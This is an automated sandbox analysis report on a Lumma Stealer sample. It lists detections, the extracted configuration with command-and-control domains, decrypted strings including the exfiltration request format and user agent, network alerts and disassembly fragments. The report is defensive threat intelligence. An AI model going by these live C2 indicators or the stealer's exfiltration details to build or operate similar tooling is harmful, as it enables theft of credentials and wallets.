Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xNuh0DUJaG.exe

Overview

General Information

Sample name:xNuh0DUJaG.exe
renamed because original name is a hash value
Original sample name:9b3e0c8c483f0708b9dc9c18ce46d0bc.exe
Analysis ID:1588972
MD5:9b3e0c8c483f0708b9dc9c18ce46d0bc
SHA1:fd95369082e2b869b184391aa9268fa64370f4a7
SHA256:4cf2d30c19e0ff537140c8717e72a8eb54a19ba9c27ce45adc7c790fc51d0549
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xNuh0DUJaG.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\xNuh0DUJaG.exe" MD5: 9B3E0C8C483F0708B9DC9C18CE46D0BC)
    • WerFault.exe (PID: 8048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 1804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["chipdonkeruz.shop", "versersleep.shop", "crowdwarek.shop", "robinsharez.shop", "handscreamny.shop", "skidjazzyric.click", "femalsabler.shop", "soundtappysk.shop", "apporholis.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.1541906304.0000000000480000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000003.00000002.1541954170.0000000000578000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: xNuh0DUJaG.exe PID: 7464JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: xNuh0DUJaG.exe PID: 7464JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:33.213889+010020283713Unknown Traffic192.168.2.1049706104.102.49.254443TCP
            2025-01-11T07:48:34.606386+010020283713Unknown Traffic192.168.2.1049708104.21.80.1443TCP
            2025-01-11T07:48:35.696742+010020283713Unknown Traffic192.168.2.1049714104.21.80.1443TCP
            2025-01-11T07:48:37.383901+010020283713Unknown Traffic192.168.2.1049725104.21.80.1443TCP
            2025-01-11T07:48:38.663034+010020283713Unknown Traffic192.168.2.1049734104.21.80.1443TCP
            2025-01-11T07:48:40.133319+010020283713Unknown Traffic192.168.2.1049743104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:35.051514+010020546531A Network Trojan was detected192.168.2.1049708104.21.80.1443TCP
            2025-01-11T07:48:36.204096+010020546531A Network Trojan was detected192.168.2.1049714104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:35.051514+010020498361A Network Trojan was detected192.168.2.1049708104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:36.204096+010020498121A Network Trojan was detected192.168.2.1049714104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.480487+010020590351Domain Observed Used for C2 Detected192.168.2.10500811.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.512095+010020590371Domain Observed Used for C2 Detected192.168.2.10628271.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.490806+010020590391Domain Observed Used for C2 Detected192.168.2.10587501.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.465985+010020590411Domain Observed Used for C2 Detected192.168.2.10612131.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.522301+010020590431Domain Observed Used for C2 Detected192.168.2.10506611.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.532793+010020590491Domain Observed Used for C2 Detected192.168.2.10612031.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.441646+010020590881Domain Observed Used for C2 Detected192.168.2.10511841.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.453201+010020590511Domain Observed Used for C2 Detected192.168.2.10531811.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:32.501329+010020590571Domain Observed Used for C2 Detected192.168.2.10639281.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:38.017404+010020480941Malware Command and Control Activity Detected192.168.2.1049725104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T07:48:33.974147+010028586661Domain Observed Used for C2 Detected192.168.2.1049706104.102.49.254443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: xNuh0DUJaG.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://sputnik-1985.com/apiOSCzAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apieBAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 3.3.xNuh0DUJaG.exe.2150000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["chipdonkeruz.shop", "versersleep.shop", "crowdwarek.shop", "robinsharez.shop", "handscreamny.shop", "skidjazzyric.click", "femalsabler.shop", "soundtappysk.shop", "apporholis.shop"], "Build id": "4h5VfH--"}
            Multi AV Scanner detection for submitted file
            Source: xNuh0DUJaG.exeVirustotal: Detection: 48%Perma Link
            Source: xNuh0DUJaG.exeReversingLabs: Detection: 47%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: xNuh0DUJaG.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: robinsharez.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: handscreamny.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: chipdonkeruz.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: versersleep.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: crowdwarek.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: apporholis.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: femalsabler.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: soundtappysk.shop
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: skidjazzyric.click
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4h5VfH--
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 3_2_00415720 CryptUnprotectData,3_2_00415720

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeUnpacked PE file: 3.2.xNuh0DUJaG.exe.400000.0.unpack
            Source: xNuh0DUJaG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49743 version: TLS 1.2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0043B870
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov edx, ecx3_2_0043B870
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, edx3_2_0040B2B0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0040C334
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov esi, ecx3_2_00415720
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_00415720
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00419840
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0040A05C
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00427070
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042D830
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0043F0E0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B882
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then jmp eax3_2_004418A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B173
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B170
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041A900
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B184
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then test esi, esi3_2_0043C9A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041B243
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EA62
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00402210
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_0040AA32
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00425AF0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_00428280
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F2A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebx, eax3_2_00405AB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebp, eax3_2_00405AB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EB5F
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042BB00
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041BB21
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441B20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041AB2A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]3_2_0040C3EC
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebx, edx3_2_0042DBF0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then jmp ecx3_2_0040D334
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00422380
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0041BBA0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0042BBA0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBA1
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_00440BAB
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBB3
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441BB0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441C40
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_00442470
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00426C76
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov eax, edi3_2_0041C400
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417405
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00417405
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov edx, ecx3_2_00417405
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00414C20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_0044042D
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_0044042D
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B484
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00427490
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00425D6A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00438520
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_00442D20
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then push edi3_2_0043C5A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0043C5A0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B652
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B667
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00418672
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409E09
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407620
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407620
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then jmp ecx3_2_0040CEC7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00416ED0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0041BEE1
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041AEFF
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0040DFE2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0040DFE2
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_00408F90
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_004427B0
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0210E249
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0210E249
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0210A2C3
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0213F347
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0211B3DA
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0211B3EB
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0210A070
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov esi, ecx3_2_021160EF
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_02117137
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then jmp ecx3_2_0210D12E
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0211C148
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0211B166
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_021091F7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_021421EA
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then jmp ecx3_2_0210D59B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov eax, edi3_2_0211C667
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_02140694
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_02140694
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_021426D7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov word ptr [esi], cx3_2_021276F7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0211B6EB
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0211773F
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_02138787
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_02102477
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0211B4AA
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_021284E7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0211F507
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0210C59B
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_021225E7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_02142A17
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, edx3_2_0210BA6C
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0212DA97
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_02119AA7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0213BAD7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov edx, ecx3_2_0213BAD7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_02117AE4
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov edx, ecx3_2_02117AE4
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0211BAE9
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0211AB67
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_02126BA7
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then push edi3_2_0213C807
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0213C807
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_02118809
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_02107887
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_02107887
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0212B8B5
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_021158FA
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_02140E12
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0212EE1A
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0212BE07
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0212EE08
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0211BE2C
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebx, edx3_2_0212DE57
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_02142F87
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then test esi, esi3_2_0213CC07
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then jmp eax3_2_02141C3E
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_0210AC99
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0212ECC9
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ecx, eax3_2_02116D15
            Source: C:\Users\user\Desktop\xNuh0DUJaG.exeCode function: 4x nop then mov ebx, eax3_2_02105D17
